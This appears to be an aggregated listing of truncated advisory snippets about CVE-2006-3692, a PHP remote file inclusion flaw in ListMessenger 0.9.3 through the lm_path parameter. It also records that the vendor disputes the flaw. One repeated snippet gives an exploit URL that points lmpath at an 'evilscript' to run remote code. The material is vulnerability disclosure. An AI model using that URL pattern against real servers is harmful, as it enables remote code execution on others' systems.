ListMessenger 0.9.3 LM_Path Parameter Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/19014/info ListMessenger is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

ListMessenger v0.9.3 Remote File Inclusion Vulnerability - Discoverd By : xoron - Conatact : x0r0nathotmail.com - script: ListMessenger 0.9.3 - URL: http://www.listmessenger.com - Exp: www.target.com/path/enduser/listmessenger.php?lmpath=evilscript? - Code: requireonce$lmpath."config.inc.php" -...

CVE-2006-3692

PHP remote file inclusion vulnerability in enduser/listmessenger.php in ListMessenger 0.9.3 allows remote attackers to execute arbitrary PHP code via a URL in the lmpath parameter. NOTE: the vendor has disputed this issue to SecurityTracker, stating that the $lmpath variable is set to a constant...

listmessenger093.txt

ListMessenger v0.9.3 Remote File Inclusion Vulnerability - Discoverd By : xoron - Conatact : x0r0nathotmail.com - script: ListMessenger 0.9.3 - URL: http://www.listmessenger.com - Exp: www.target.com/path/enduser/listmessenger.php?lmpath=evilscript? - Code: requireonce$lmpath."config.inc.php" -...

CVE-2006-3692

The CVE-2006-3692 entry concerns ListMessenger 0.9.3. Affected component: enduser/listmessenger.php. Issue: PHP remote file inclusion via the lm_path parameter that can allow remote code execution. Root cause described in sources: the vulnerability arises from a parameter (lm_path) used in a way ...

CVE-2006-3692

PHP remote file inclusion vulnerability in enduser/listmessenger.php in ListMessenger 0.9.3 allows remote attackers to execute arbitrary PHP code via a URL in the lmpath parameter. NOTE: the vendor has disputed this issue to SecurityTracker, stating that the $lmpath variable is set to a constant...

PT-2006-4558 · Enduser · Listmessenger

Name of the Vulnerable Software and Affected Versions: ListMessenger version 0.9.3 Description: A remote file inclusion issue in enduser/listmessenger.php allows remote attackers to execute arbitrary PHP code via a URL in the lm path parameter. However, the vendor has disputed this issue, stating...

ListMessenger 0.9.3 - 'LM_Path' Remote File Inclusion

source: https://www.securityfocus.com/bid/19014/info ListMessenger is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicio...

ListMessenger 0.9.3 - LM_Path Remote File Inclusion

ListMessenger 0.9.3 - LMPath Remote File Inclusion source: https://www.securityfocus.com/bid/19014/info ListMessenger is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to...